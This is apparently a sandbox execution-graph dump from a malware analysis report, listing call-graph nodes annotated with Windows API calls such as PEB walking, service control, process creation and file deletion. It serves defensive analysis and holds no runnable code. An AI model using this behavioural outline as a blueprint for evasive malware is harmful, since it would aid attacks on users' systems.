                                                                                                                execution_graph 3790 2025d1 3795 1e50cf 3790->3795 3792 202661 3831 1f7b25 3792->3831 3794 202675 3805 1e638d 3795->3805 3797 1e6c56 4047 1ecde0 3797->4047 3800 1e6c46 3800->3792 3802 1f8ef8 GetPEB RtlAllocateHeap 3802->3805 3805->3797 3805->3800 3805->3802 3810 1f17d2 GetPEB 3805->3810 3822 1f34da GetPEB RtlAllocateHeap 3805->3822 3829 1ff94b GetPEB 3805->3829 3834 200e7a 3805->3834 3842 1e9af8 3805->3842 3846 1e8844 3805->3846 3856 1e9c1b 3805->3856 3869 2013a3 3805->3869 3880 1e82d2 3805->3880 3890 1f416e 3805->3890 3904 1f8131 3805->3904 3916 1fd15e 3805->3916 3925 1ffecb 3805->3925 3934 1f1a83 3805->3934 3937 1feec2 3805->3937 3947 1e79cc 3805->3947 3951 1f8966 3805->3951 3960 200a01 3805->3960 3971 1f9285 3805->3971 3975 1ffad1 3805->3975 3980 1ea9cf 3805->3980 3989 2026fc 3805->3989 3994 201fc7 3805->3994 4001 1e8ee5 3805->4001 4007 1fd4ae 3805->4007 4018 1eae33 3805->4018 4022 1f604b 3805->4022 4028 1f26f3 3805->4028 4031 1ee65a 3805->4031 4038 1f3231 3805->4038 3810->3805 3822->3805 3829->3805 3832 1e7f78 GetPEB 3831->3832 3833 1f7b93 ExitProcess 3832->3833 3833->3794 3837 2011a2 3834->3837 3838 2012e6 3837->3838 4061 1f91cc 3837->4061 4065 1f02d8 3837->4065 4069 1fa50a 3837->4069 4073 200575 3837->4073 4077 202545 3837->4077 3838->3805 3843 1e9b12 3842->3843 3844 1e9c05 3843->3844 3845 201e49 GetPEB RtlAllocateHeap LoadLibraryW 3843->3845 3844->3805 3845->3843 3849 1e8b4a 3846->3849 3852 1e8c94 3849->3852 3855 1e8c92 3849->3855 4115 1e3466 3849->4115 4119 1e6e01 3849->4119 4123 1fed7b 3849->4123 4127 1e303a 3849->4127 4132 1e7761 3849->4132 3854 200575 GetPEB 3852->3854 3854->3855 3855->3805 3861 1ea250 3856->3861 3858 1fed7b 2 API calls 3858->3861 3860 1e6e01 2 API calls 3860->3861 3861->3858 3861->3860 3864 1ea4b4 3861->3864 3865 1ea4b2 3861->3865 3868 1e3466 2 API calls 3861->3868 4154 1e364e 3861->4154 4165 1f9862 3861->4165 4169 1ff5d9 3861->4169 4173 1ed467 3861->4173 4177 1ff94b 3861->4177 3866 1fed7b 2 API calls 3864->3866 3865->3805 3866->3865 3868->3861 3878 2017ea 3869->3878 3870 2019e8 3872 1f02d8 2 API calls 3870->3872 3871 202545 GetPEB 3871->3878 3873 2019e6 3872->3873 3873->3805 3875 1fa50a 2 API calls 3875->3878 3876 1ff5d9 2 API calls 3876->3878 3878->3870 3878->3871 3878->3873 3878->3875 3878->3876 3879 1ff94b GetPEB 3878->3879 4213 1feab3 3878->4213 4217 1f8eb3 3878->4217 3879->3878 3881 1e855b 3880->3881 3882 1e8648 3881->3882 3883 1ff5d9 2 API calls 3881->3883 3885 200575 GetPEB 3881->3885 3886 1f8eb3 GetPEB 3881->3886 3887 1e8646 3881->3887 3888 1ff94b GetPEB 3881->3888 4221 1e4b40 3881->4221 4235 1e8fe9 3882->4235 3883->3881 3885->3881 3886->3881 3887->3805 3888->3881 3892 1f468e 3890->3892 3894 1ff5d9 2 API calls 3892->3894 3895 1f46c9 3892->3895 3896 1f4876 3892->3896 3899 1e303a GetPEB RtlAllocateHeap 3892->3899 3901 1ff94b GetPEB 3892->3901 4269 1ed2c9 3892->4269 4273 1e9291 3892->4273 4277 1f2519 3892->4277 3894->3892 3898 1f17d2 GetPEB 3895->3898 3896->3896 3900 1f46df 3898->3900 3899->3892 3902 1f17d2 GetPEB 3900->3902 3901->3892 3903 1f46f2 3902->3903 3903->3805 4281 1f1919 3904->4281 3906 1ff5d9 GetPEB RtlAllocateHeap 3907 1f857d 3906->3907 3907->3906 3908 1ecca2 GetPEB 3907->3908 3909 1f85ac 3907->3909 3911 1f86e9 3907->3911 3912 1ed467 GetPEB 3907->3912 3914 1f8eb3 GetPEB 3907->3914 3915 1ff94b GetPEB 3907->3915 3908->3907 3910 1e4b40 2 API calls 3909->3910 3913 1f85cb 3910->3913 3911->3911 3912->3907 3913->3805 3914->3907 3915->3907 3921 1fd360 3916->3921 3917 1e6e01 2 API calls 3917->3921 3919 1fed7b 2 API calls 3919->3921 3920 1fd3be 3920->3805 3921->3917 3921->3919 3921->3920 3922 1fd3ab 3921->3922 3923 1e8e38 2 API calls 3921->3923 4284 20267c 3921->4284 3924 1fed7b 2 API calls 3922->3924 3923->3921 3924->3920 3930 1ffee5 3925->3930 3927 1ff5d9 GetPEB RtlAllocateHeap 3927->3930 3929 1e3466 2 API calls 3929->3930 3930->3927 3930->3929 3931 200568 3930->3931 3932 1ed467 GetPEB 3930->3932 3933 1ff94b GetPEB 3930->3933 4288 1f4e54 3930->4288 4298 20224c 3930->4298 3931->3805 3932->3930 3933->3930 3935 1e303a 2 API calls 3934->3935 3936 1f1b14 3935->3936 3936->3805 3945 1fef01 3937->3945 3940 1f25cd GetPEB 3940->3945 3941 1ff5b4 3941->3805 3945->3940 3945->3941 3946 1f17d2 GetPEB 3945->3946 4306 1f1b29 3945->4306 4318 1fe168 3945->4318 4329 1f519c 3945->4329 4347 1fbd63 3945->4347 4364 1f2b1f 3945->4364 3946->3945 3948 1e79e8 3947->3948 3949 1e7f78 GetPEB 3948->3949 3950 1e7a5b 3949->3950 3950->3805 3956 1f8c0a 3951->3956 3952 1ff5d9 2 API calls 3952->3956 3953 1f8cc1 4525 1f7098 3953->4525 3954 1f8eb3 GetPEB 3954->3956 3956->3952 3956->3953 3956->3954 3957 1f8cbf 3956->3957 3959 1ff94b GetPEB 3956->3959 4521 1e2263 3956->4521 3957->3805 3959->3956 3961 200a22 3960->3961 3964 1e303a 2 API calls 3961->3964 3968 200ddc 3961->3968 4549 1e1a5f 3961->4549 4557 1eaebb 3961->4557 4580 1ed4bc 3961->4580 4600 1f6e97 3961->4600 4607 1f9a0c 3961->4607 4619 1ec151 3961->4619 4627 1e958a 3961->4627 3964->3961 3968->3805 3974 1f952d 3971->3974 3972 1f960e 3972->3805 3973 1ecca2 GetPEB 3973->3974 3974->3972 3974->3973 3978 1ffbc6 3975->3978 3976 1ffc88 3976->3805 3978->3976 4740 1ed3bf 3978->4740 4744 1ec0ba 3978->4744 3982 1eac19 3980->3982 3985 1eadad 3982->3985 3988 1f17d2 GetPEB 3982->3988 4748 200de9 3982->4748 4752 1f2657 3982->4752 4756 1e22f7 3982->4756 4763 1f3e11 3982->4763 4766 1e7c7a 3982->4766 3985->3805 3988->3982 3990 1f1919 GetPEB 3989->3990 3991 2027a3 3990->3991 4774 1fee14 3991->4774 3997 2021ad 3994->3997 3995 202212 3998 1f0231 GetPEB 3995->3998 3997->3995 3999 1e303a 2 API calls 3997->3999 4000 202210 3997->4000 4778 1f6d6b 3997->4778 3998->4000 3999->3997 4000->3805 4005 1e8f94 4001->4005 4002 1e8f9c 4782 1e3f5a 4002->4782 4003 1e303a 2 API calls 4003->4005 4005->4002 4005->4003 4006 1e8fb3 4005->4006 4006->3805 4014 1fdc82 4007->4014 4009 1ff5d9 GetPEB RtlAllocateHeap 4009->4014 4010 1f0184 GetPEB 4010->4014 4011 1ed467 GetPEB 4011->4014 4012 1fdf19 4012->3805 4014->4009 4014->4010 4014->4011 4014->4012 4016 1e3466 2 API calls 4014->4016 4017 1ff94b GetPEB 4014->4017 4815 1e3e99 4014->4815 4819 1f7a67 4014->4819 4823 1f3cbe 4014->4823 4016->4014 4017->4014 4019 1eae46 4018->4019 4020 1e7f78 GetPEB 4019->4020 4021 1eaeaf 4020->4021 4021->3805 4023 1f6226 4022->4023 4026 1e2263 GetPEB 4023->4026 4027 1f6266 4023->4027 4827 1eca3c 4023->4827 4830 1f7b9e 4023->4830 4026->4023 4027->3805 4029 1e79cc GetPEB 4028->4029 4030 1f277c 4029->4030 4030->3805 4034 1ee68a 4031->4034 4032 1eeb20 4033 1e4e8f GetPEB 4032->4033 4036 1eeb1e 4033->4036 4034->4032 4035 1e303a 2 API calls 4034->4035 4034->4036 4037 1e4e8f GetPEB 4034->4037 4035->4034 4036->3805 4037->4034 4043 1f324b 4038->4043 4041 1f343d 4044 1f17d2 GetPEB 4041->4044 4042 1f343b 4042->3805 4043->4041 4043->4042 4045 1e303a 2 API calls 4043->4045 4868 1fe5ed 4043->4868 4878 1f8cf2 4043->4878 4882 1ebdeb 4043->4882 4044->4042 4045->4043 4051 1ed14d 4047->4051 4048 1ff5d9 2 API calls 4048->4051 4050 1ed27f 4053 1e2263 GetPEB 4050->4053 4051->4048 4051->4050 4052 1f8eb3 GetPEB 4051->4052 4055 1ff94b GetPEB 4051->4055 4058 1fd15e 4 API calls 4051->4058 4059 1ed27d 4051->4059 4060 1e4b40 2 API calls 4051->4060 4975 201a0a 4051->4975 4982 1ec4e5 4051->4982 4052->4051 4054 1ed297 4053->4054 4991 1e35b1 4054->4991 4055->4051 4058->4051 4059->3800 4060->4051 4062 1f91ec 4061->4062 4081 1e7f78 4062->4081 4066 1f02ee 4065->4066 4067 1e7f78 GetPEB 4066->4067 4068 1f0380 CloseHandle 4067->4068 4068->3837 4070 1fa53c 4069->4070 4071 1e7f78 GetPEB 4070->4071 4072 1fa5d0 CreateFileW 4071->4072 4072->3837 4074 20058d 4073->4074 4111 1f97b1 4074->4111 4078 202558 4077->4078 4079 1e7f78 GetPEB 4078->4079 4080 2025c5 4079->4080 4080->3837 4082 1e8055 4081->4082 4083 1e8032 4081->4083 4082->3837 4087 1e806b 4083->4087 4085 1e8040 4090 1f66c8 4085->4090 4094 1e32ac GetPEB 4087->4094 4089 1e812d 4089->4085 4092 1f66ed 4090->4092 4091 1f680d 4091->4082 4092->4091 4095 1ebb14 4092->4095 4094->4089 4096 1ebce5 4095->4096 4103 1fa5eb 4096->4103 4099 1ebd2c 4101 1ebd62 4099->4101 4102 1f66c8 GetPEB 4099->4102 4101->4091 4102->4101 4104 1fa602 4103->4104 4105 1e7f78 GetPEB 4104->4105 4106 1ebd0c 4105->4106 4106->4099 4107 1e31ea 4106->4107 4108 1e3200 4107->4108 4109 1e7f78 GetPEB 4108->4109 4110 1e32a0 4109->4110 4110->4099 4112 1f97d5 4111->4112 4113 1e7f78 GetPEB 4112->4113 4114 1f9852 4113->4114 4114->3837 4116 1e348b 4115->4116 4117 1e7f78 GetPEB 4116->4117 4118 1e34f4 SHGetFolderPathW 4117->4118 4118->3849 4120 1e6e19 4119->4120 4121 1e7f78 GetPEB 4120->4121 4122 1e6ea5 OpenSCManagerW 4121->4122 4122->3849 4124 1fed91 4123->4124 4125 1e7f78 GetPEB 4124->4125 4126 1fee09 CloseServiceHandle 4125->4126 4126->3849 4139 1f345b 4127->4139 4131 1e3122 4131->3849 4133 1e78e4 4132->4133 4135 1e799d 4133->4135 4136 200575 GetPEB 4133->4136 4138 1e799b 4133->4138 4146 1f0184 4133->4146 4150 1e91f2 4135->4150 4136->4133 4138->3849 4140 1e7f78 GetPEB 4139->4140 4141 1e310a 4140->4141 4142 1e3506 4141->4142 4143 1e3522 4142->4143 4144 1e7f78 GetPEB 4143->4144 4145 1e359f RtlAllocateHeap 4144->4145 4145->4131 4147 1f019a 4146->4147 4148 1e7f78 GetPEB 4147->4148 4149 1f0225 4148->4149 4149->4133 4151 1e920b 4150->4151 4152 1e7f78 GetPEB 4151->4152 4153 1e9282 4152->4153 4153->4138 4162 1e3678 4154->4162 4156 1f17d2 GetPEB 4156->4162 4159 1e3df0 4159->3861 4161 1e303a GetPEB RtlAllocateHeap 4161->4162 4162->4156 4162->4159 4162->4161 4163 1fed7b 2 API calls 4162->4163 4181 1ecd1c 4162->4181 4185 1f640e 4162->4185 4189 1e8e38 4162->4189 4193 1e32b3 4162->4193 4197 1ecca2 4162->4197 4163->4162 4166 1f98a4 4165->4166 4167 1e7f78 GetPEB 4166->4167 4168 1f992e 4167->4168 4168->3861 4170 1ff5f3 4169->4170 4171 1e303a 2 API calls 4170->4171 4172 1ff6bd 4171->4172 4172->3861 4174 1ed492 4173->4174 4200 1eadb7 4174->4200 4178 1ff960 4177->4178 4203 1f17d2 4178->4203 4182 1ecd46 4181->4182 4183 1e7f78 GetPEB 4182->4183 4184 1ecdc8 4183->4184 4184->4162 4186 1f6424 4185->4186 4187 1e7f78 GetPEB 4186->4187 4188 1f64bd 4187->4188 4188->4162 4190 1e8e54 4189->4190 4191 1e7f78 GetPEB 4190->4191 4192 1e8ed4 OpenServiceW 4191->4192 4192->4162 4194 1e32ec 4193->4194 4195 1e7f78 GetPEB 4194->4195 4196 1e3397 4195->4196 4196->4162 4198 1e7f78 GetPEB 4197->4198 4199 1ecd13 4198->4199 4199->4162 4201 1e7f78 GetPEB 4200->4201 4202 1eae2c 4201->4202 4202->3861 4204 1f17e2 4203->4204 4205 1f345b GetPEB 4204->4205 4206 1f18fd 4205->4206 4209 1e6f64 4206->4209 4210 1e6f81 4209->4210 4211 1e7f78 GetPEB 4210->4211 4212 1e7002 4211->4212 4212->3861 4214 1fead4 4213->4214 4215 1e7f78 GetPEB 4214->4215 4216 1feb4e SetFileInformationByHandle 4215->4216 4216->3878 4218 1f8ed5 4217->4218 4219 1eadb7 GetPEB 4218->4219 4220 1f8ef0 4219->4220 4220->3878 4222 1e4b5a 4221->4222 4245 1f25cd 4222->4245 4225 1f25cd GetPEB 4226 1e4dff 4225->4226 4227 1f25cd GetPEB 4226->4227 4228 1e4e15 4227->4228 4229 1e91f2 GetPEB 4228->4229 4230 1e4e30 4229->4230 4231 1e91f2 GetPEB 4230->4231 4232 1e4e4c 4231->4232 4249 1f7da0 4232->4249 4234 1e4e81 4234->3881 4236 1e9003 4235->4236 4237 1ff5d9 2 API calls 4236->4237 4238 1e91a5 4237->4238 4261 201c9b 4238->4261 4241 1ff94b GetPEB 4242 1e91d7 4241->4242 4265 1e7bc6 4242->4265 4244 1e91e9 4244->3887 4246 1f25e3 4245->4246 4253 1e218f 4246->4253 4250 1f7db3 4249->4250 4251 1e7f78 GetPEB 4250->4251 4252 1f7e32 SHFileOperationW 4251->4252 4252->4234 4254 1e21a7 4253->4254 4257 1e7b24 4254->4257 4258 1e7b3c 4257->4258 4259 1e7f78 GetPEB 4258->4259 4260 1e221a 4259->4260 4260->4225 4262 201cba 4261->4262 4263 1eadb7 GetPEB 4262->4263 4264 1e91c4 4263->4264 4264->4241 4266 1e7bd6 4265->4266 4267 1e7f78 GetPEB 4266->4267 4268 1e7c6e DeleteFileW 4267->4268 4268->4244 4270 1ed2ee 4269->4270 4271 1e7f78 GetPEB 4270->4271 4272 1ed34d 4271->4272 4272->3892 4274 1e92b3 4273->4274 4275 1e7f78 GetPEB 4274->4275 4276 1e932f 4275->4276 4276->3892 4278 1f2532 4277->4278 4279 1e7f78 GetPEB 4278->4279 4280 1f259c 4279->4280 4280->3892 4282 1e7f78 GetPEB 4281->4282 4283 1f19a8 4282->4283 4283->3907 4285 20268c 4284->4285 4286 1e7f78 GetPEB 4285->4286 4287 2026f0 4286->4287 4287->3921 4289 1f4e7d 4288->4289 4290 1f25cd GetPEB 4289->4290 4291 1f504f 4290->4291 4302 1e816b 4291->4302 4293 1f508e 4294 1f5099 4293->4294 4295 1f02d8 2 API calls 4293->4295 4294->3930 4296 1f50b6 4295->4296 4297 1f02d8 2 API calls 4296->4297 4297->4294 4299 202274 4298->4299 4300 1eadb7 GetPEB 4299->4300 4301 202299 4300->4301 4301->3930 4303 1e81a6 4302->4303 4304 1e7f78 GetPEB 4303->4304 4305 1e8221 CreateProcessW 4304->4305 4305->4293 4317 1f1b59 4306->4317 4307 1e303a 2 API calls 4307->4317 4308 1f23a5 4310 1f17d2 GetPEB 4308->4310 4309 1f17d2 GetPEB 4309->4317 4312 1f23a3 4310->4312 4312->3945 4317->4307 4317->4308 4317->4309 4317->4312 4373 1f7730 4317->4373 4380 1faf0b 4317->4380 4395 1f6845 4317->4395 4399 1ffd42 4317->4399 4403 1f490e 4317->4403 4325 1fe468 4318->4325 4320 1ff5d9 2 API calls 4320->4325 4321 1fe5e8 4321->4321 4322 1fe4a9 4326 1f17d2 GetPEB 4322->4326 4323 1eadb7 GetPEB 4323->4325 4324 1e303a 2 API calls 4324->4325 4325->4320 4325->4321 4325->4322 4325->4323 4325->4324 4328 1ff94b GetPEB 4325->4328 4438 1f7e3d 4325->4438 4327 1fe4b7 4326->4327 4327->3945 4328->4325 4345 1f5be0 4329->4345 4330 1e303a GetPEB RtlAllocateHeap 4330->4345 4331 1ffd42 GetPEB 4331->4345 4332 1f600d 4334 1f17d2 GetPEB 4332->4334 4333 1ee4f5 2 API calls 4333->4345 4337 1f5e22 4334->4337 4335 1f5db1 4449 1ee4f5 4335->4449 4336 1ff5d9 2 API calls 4336->4345 4337->3945 4341 1eadb7 GetPEB 4341->4345 4344 1ff94b GetPEB 4344->4337 4345->4330 4345->4331 4345->4332 4345->4333 4345->4335 4345->4336 4345->4341 4346 1ff94b GetPEB 4345->4346 4457 1ed360 4345->4457 4346->4345 4363 1fbdce 4347->4363 4350 1ff5d9 2 API calls 4350->4363 4352 1fced6 4493 1fece4 4352->4493 4353 1fece4 GetPEB 4353->4363 4355 1f17d2 GetPEB 4355->4363 4359 1fceef 4359->3945 4360 1ff94b GetPEB 4360->4363 4361 1f6561 GetPEB 4361->4363 4363->4350 4363->4352 4363->4353 4363->4355 4363->4359 4363->4360 4363->4361 4461 1e3129 4363->4461 4465 1f3d5b 4363->4465 4469 1e8d7e 4363->4469 4473 1e6d15 4363->4473 4476 1f35a3 4363->4476 4485 1ecafe 4363->4485 4489 1f038b 4363->4489 4365 1f2b47 4364->4365 4367 1f2f8c 4365->4367 4369 1f2f8a 4365->4369 4370 1e303a 2 API calls 4365->4370 4372 1ffd42 GetPEB 4365->4372 4505 1fa916 4365->4505 4512 1fdf2b 4365->4512 4368 1f17d2 GetPEB 4367->4368 4368->4369 4369->3945 4370->4365 4372->4365 4377 1f775f 4373->4377 4374 1f7a3f 4376 1e4e8f GetPEB 4374->4376 4375 1f7a3d 4375->4317 4376->4375 4377->4374 4377->4375 4379 1e303a 2 API calls 4377->4379 4410 1e4e8f 4377->4410 4379->4377 4393 1faf45 4380->4393 4381 1fbd34 4382 1f2519 GetPEB 4381->4382 4384 1fbd32 4382->4384 4383 1e303a 2 API calls 4383->4393 4384->4317 4386 1ff5d9 GetPEB RtlAllocateHeap 4386->4393 4391 1f17d2 GetPEB 4391->4393 4392 1ed2c9 GetPEB 4392->4393 4393->4381 4393->4383 4393->4384 4393->4386 4393->4391 4393->4392 4394 1ff94b GetPEB 4393->4394 4414 1ffe12 4393->4414 4418 1fceff 4393->4418 4422 1e500a 4393->4422 4426 1e4f68 4393->4426 4430 1eeb4b 4393->4430 4394->4393 4396 1f6858 4395->4396 4397 1ffd42 GetPEB 4396->4397 4398 1f68c1 4397->4398 4398->4317 4400 1ffd60 4399->4400 4434 1f6ca3 4400->4434 4406 1f4930 4403->4406 4404 1e303a 2 API calls 4404->4406 4405 1f4e35 4407 1f17d2 GetPEB 4405->4407 4406->4404 4406->4405 4408 1f4e1e 4406->4408 4409 1f50d4 GetPEB 4406->4409 4407->4408 4408->4317 4409->4406 4411 1e4ea8 4410->4411 4412 1ffd42 GetPEB 4411->4412 4413 1e4f5a 4412->4413 4413->4377 4415 1ffe31 4414->4415 4416 1e7f78 GetPEB 4415->4416 4417 1ffeb7 4416->4417 4417->4393 4419 1fcf1e 4418->4419 4420 1e7f78 GetPEB 4419->4420 4421 1fcf8b 4420->4421 4421->4393 4423 1e503a 4422->4423 4424 1e7f78 GetPEB 4423->4424 4425 1e50b4 4424->4425 4425->4393 4427 1e4f81 4426->4427 4428 1e7f78 GetPEB 4427->4428 4429 1e4fff 4428->4429 4429->4393 4431 1eeb77 4430->4431 4432 1e7f78 GetPEB 4431->4432 4433 1eebfc 4432->4433 4433->4393 4435 1f6cc5 4434->4435 4436 1e7f78 GetPEB 4435->4436 4437 1f6d2a 4436->4437 4437->4317 4444 1f7e55 4438->4444 4439 1f80fc 4441 201ce8 GetPEB 4439->4441 4443 1f80fa 4441->4443 4442 1e303a 2 API calls 4442->4444 4443->4325 4444->4439 4444->4442 4444->4443 4445 201ce8 4444->4445 4446 201d0e 4445->4446 4447 1e7f78 GetPEB 4446->4447 4448 201d89 4447->4448 4448->4444 4450 1ee508 4449->4450 4451 1e303a 2 API calls 4450->4451 4452 1ee5ee 4451->4452 4453 1eec15 4452->4453 4454 1eec31 4453->4454 4455 1eadb7 GetPEB 4454->4455 4456 1eec4c 4455->4456 4456->4344 4458 1ed385 4457->4458 4459 1eadb7 GetPEB 4458->4459 4460 1ed3a2 4459->4460 4460->4345 4462 1e3150 4461->4462 4463 1e7f78 GetPEB 4462->4463 4464 1e31d5 4463->4464 4464->4363 4466 1f3d7e 4465->4466 4467 1e7f78 GetPEB 4466->4467 4468 1f3e01 4467->4468 4468->4363 4470 1e8db1 4469->4470 4471 1e7f78 GetPEB 4470->4471 4472 1e8e1f 4471->4472 4472->4363 4497 1f6361 4473->4497 4482 1f3831 4476->4482 4477 1f394d 4479 1f3955 4477->4479 4480 1f17d2 GetPEB 4477->4480 4479->4363 4480->4479 4481 1e303a GetPEB RtlAllocateHeap 4481->4482 4482->4477 4482->4481 4483 1ffd42 GetPEB 4482->4483 4484 1f17d2 GetPEB 4482->4484 4501 1f19b1 4482->4501 4483->4482 4484->4482 4486 1ecb2d 4485->4486 4487 1e7f78 GetPEB 4486->4487 4488 1ecba6 4487->4488 4488->4363 4490 1f03ad 4489->4490 4491 1e7f78 GetPEB 4490->4491 4492 1f041d 4491->4492 4492->4363 4494 1fecfa 4493->4494 4495 1e7f78 GetPEB 4494->4495 4496 1fed6b 4495->4496 4496->4359 4498 1f6388 4497->4498 4499 1e7f78 GetPEB 4498->4499 4500 1e6dcb 4499->4500 4500->4363 4502 1f19d4 4501->4502 4503 1e7f78 GetPEB 4502->4503 4504 1f1a6e 4503->4504 4504->4482 4508 1fa945 4505->4508 4506 200908 GetPEB 4506->4508 4507 1faed1 4509 1f17d2 GetPEB 4507->4509 4508->4506 4508->4507 4510 1faecf 4508->4510 4511 1e303a 2 API calls 4508->4511 4509->4510 4510->4365 4511->4508 4513 1fdf4c 4512->4513 4515 1faf0b 2 API calls 4513->4515 4516 1fe15e 4513->4516 4517 1ea762 4513->4517 4515->4513 4516->4365 4518 1ea791 4517->4518 4519 1e7f78 GetPEB 4518->4519 4520 1ea812 4519->4520 4520->4513 4522 1e2279 4521->4522 4523 1e7f78 GetPEB 4522->4523 4524 1e22ec 4523->4524 4524->3956 4526 1f70c6 4525->4526 4527 1f7715 4526->4527 4528 1f7717 4526->4528 4532 201c9b GetPEB 4526->4532 4533 1ff5d9 GetPEB RtlAllocateHeap 4526->4533 4534 1ff94b GetPEB 4526->4534 4535 1f8eb3 GetPEB 4526->4535 4536 1f7098 2 API calls 4526->4536 4537 2027c2 4526->4537 4541 1eec5d 4526->4541 4527->3957 4545 1e6eb4 4528->4545 4532->4526 4533->4526 4534->4526 4535->4526 4536->4526 4538 2027db 4537->4538 4539 1e7f78 GetPEB 4538->4539 4540 20284c 4539->4540 4540->4526 4542 1eec73 4541->4542 4543 1e7f78 GetPEB 4542->4543 4544 1eecfc 4543->4544 4544->4526 4546 1e6eca 4545->4546 4547 1e7f78 GetPEB 4546->4547 4548 1e6f59 4547->4548 4548->4527 4555 1e1cb1 4549->4555 4551 1e1db1 4655 201be6 4551->4655 4552 1e1daf 4552->3961 4555->4551 4555->4552 4638 1f3e89 4555->4638 4646 1e7013 4555->4646 4651 1f0231 4555->4651 4577 1eb6c5 4557->4577 4558 2026fc GetPEB 4558->4577 4560 1eb9cb 4561 1f02d8 2 API calls 4560->4561 4563 1eb948 4561->4563 4563->3961 4564 1eb94d 4565 1f4e54 3 API calls 4564->4565 4567 1eb983 4565->4567 4566 200575 GetPEB 4566->4577 4567->4563 4571 1f02d8 2 API calls 4567->4571 4568 1f02d8 GetPEB CloseHandle 4568->4577 4570 1e2263 GetPEB 4570->4577 4572 1eb9a8 4571->4572 4574 1f02d8 2 API calls 4572->4574 4574->4563 4575 1ff5d9 2 API calls 4575->4577 4576 1f8eb3 GetPEB 4576->4577 4577->4558 4577->4560 4577->4563 4577->4564 4577->4566 4577->4568 4577->4570 4577->4575 4577->4576 4578 1ff94b GetPEB 4577->4578 4671 1f3983 4577->4671 4679 1f9054 4577->4679 4683 2005f6 4577->4683 4690 1e71e3 4577->4690 4700 20131d 4577->4700 4578->4577 4727 1e8ce7 4580->4727 4582 1f7e3d 2 API calls 4597 1ee08b 4582->4597 4583 1f02d8 2 API calls 4583->4597 4584 1f4e54 3 API calls 4584->4597 4585 1e3466 2 API calls 4585->4597 4586 1f17d2 GetPEB 4586->4597 4587 1ee4cd 4587->3961 4588 1f0184 GetPEB 4588->4597 4590 200575 GetPEB 4590->4597 4591 1ed467 GetPEB 4591->4597 4593 1e2263 GetPEB 4593->4597 4594 1f9054 GetPEB 4594->4597 4595 1ff5d9 GetPEB RtlAllocateHeap 4595->4597 4596 1f8eb3 GetPEB 4596->4597 4597->4582 4597->4583 4597->4584 4597->4585 4597->4586 4597->4587 4597->4588 4597->4590 4597->4591 4597->4593 4597->4594 4597->4595 4597->4596 4598 1ff94b GetPEB 4597->4598 4599 2005f6 3 API calls 4597->4599 4730 1ea4de 4597->4730 4736 1f68c8 4597->4736 4598->4597 4599->4597 4605 1f701b 4600->4605 4601 1f708b 4601->3961 4602 1f17d2 GetPEB 4602->4605 4603 1e79cc GetPEB 4603->4605 4604 201be6 GetPEB 4604->4605 4605->4601 4605->4602 4605->4603 4605->4604 4606 1f02d8 2 API calls 4605->4606 4606->4605 4609 1fa151 4607->4609 4608 1e3466 2 API calls 4608->4609 4609->4608 4610 1fa36e 4609->4610 4611 200575 GetPEB 4609->4611 4612 1e2263 GetPEB 4609->4612 4613 1f8eb3 GetPEB 4609->4613 4614 1f9054 GetPEB 4609->4614 4615 1ff94b GetPEB 4609->4615 4616 1ff5d9 GetPEB RtlAllocateHeap 4609->4616 4617 1f4e54 3 API calls 4609->4617 4618 2005f6 3 API calls 4609->4618 4610->3961 4611->4609 4612->4609 4613->4609 4614->4609 4615->4609 4616->4609 4617->4609 4618->4609 4624 1ec3cc 4619->4624 4620 1f0231 GetPEB 4620->4624 4621 1ec4ca 4621->3961 4622 1ec4cc 4625 201be6 GetPEB 4622->4625 4623 1f3e89 GetPEB 4623->4624 4624->4620 4624->4621 4624->4622 4624->4623 4626 1e7013 GetPEB 4624->4626 4625->4621 4626->4624 4635 1e999b 4627->4635 4628 1f4e54 3 API calls 4628->4635 4629 200575 GetPEB 4629->4635 4630 1e9aed 4630->3961 4631 1e2263 GetPEB 4631->4635 4632 1f9054 GetPEB 4632->4635 4633 1ff5d9 2 API calls 4633->4635 4634 1f8eb3 GetPEB 4634->4635 4635->4628 4635->4629 4635->4630 4635->4631 4635->4632 4635->4633 4635->4634 4636 1ff94b GetPEB 4635->4636 4637 2005f6 3 API calls 4635->4637 4636->4635 4637->4635 4639 1f3ea4 4638->4639 4640 1f4164 4639->4640 4659 1e427c 4639->4659 4640->4555 4643 1ffd42 GetPEB 4644 1f411b 4643->4644 4644->4640 4645 1ffd42 GetPEB 4644->4645 4645->4644 4647 1e702a 4646->4647 4648 1e71d4 4647->4648 4649 1e31ea GetPEB 4647->4649 4663 201da1 4647->4663 4648->4555 4649->4647 4652 1f0256 4651->4652 4653 1e7f78 GetPEB 4652->4653 4654 1f02c5 4653->4654 4654->4555 4656 201bf9 4655->4656 4667 1fa873 4656->4667 4660 1e429a 4659->4660 4661 1e7f78 GetPEB 4660->4661 4662 1e42ff 4661->4662 4662->4640 4662->4643 4664 201dba 4663->4664 4665 1e7f78 GetPEB 4664->4665 4666 201e3b 4665->4666 4666->4647 4668 1fa88e 4667->4668 4669 1e7f78 GetPEB 4668->4669 4670 1fa906 4669->4670 4670->4552 4673 1f39a7 4671->4673 4674 20131d GetPEB 4673->4674 4675 1f3b7f 4673->4675 4676 1f3b6a 4673->4676 4703 1ecbbf 4673->4703 4707 1fec35 4673->4707 4674->4673 4675->4577 4678 1f02d8 2 API calls 4676->4678 4678->4675 4680 1f906e 4679->4680 4681 1ecca2 GetPEB 4680->4681 4682 1f9163 4681->4682 4682->4577 4684 200618 4683->4684 4685 1fa50a 2 API calls 4684->4685 4686 200876 4684->4686 4687 200863 4684->4687 4711 1e7e8a 4684->4711 4685->4684 4686->4577 4689 1f02d8 2 API calls 4687->4689 4689->4686 4696 1e7223 4690->4696 4691 1f25cd GetPEB 4691->4696 4692 1e773f 4723 1f8e1d 4692->4723 4694 1ff5d9 2 API calls 4694->4696 4696->4691 4696->4692 4696->4694 4697 1e773d 4696->4697 4699 1ff94b GetPEB 4696->4699 4715 2022f2 4696->4715 4719 1f23c7 4696->4719 4697->4577 4699->4696 4701 1e7f78 GetPEB 4700->4701 4702 20139a 4701->4702 4702->4577 4704 1ecbeb 4703->4704 4705 1e7f78 GetPEB 4704->4705 4706 1ecc88 4705->4706 4706->4673 4708 1fec4c 4707->4708 4709 1e7f78 GetPEB 4708->4709 4710 1fecd5 4709->4710 4710->4673 4712 1e7eb1 4711->4712 4713 1e7f78 GetPEB 4712->4713 4714 1e7f13 4713->4714 4714->4684 4716 202310 4715->4716 4717 1e7f78 GetPEB 4716->4717 4718 2023a9 4717->4718 4718->4696 4720 1f2408 4719->4720 4721 1e7f78 GetPEB 4720->4721 4722 1f247e 4721->4722 4722->4696 4724 1f8e30 4723->4724 4725 1e7f78 GetPEB 4724->4725 4726 1f8ea8 4725->4726 4726->4697 4728 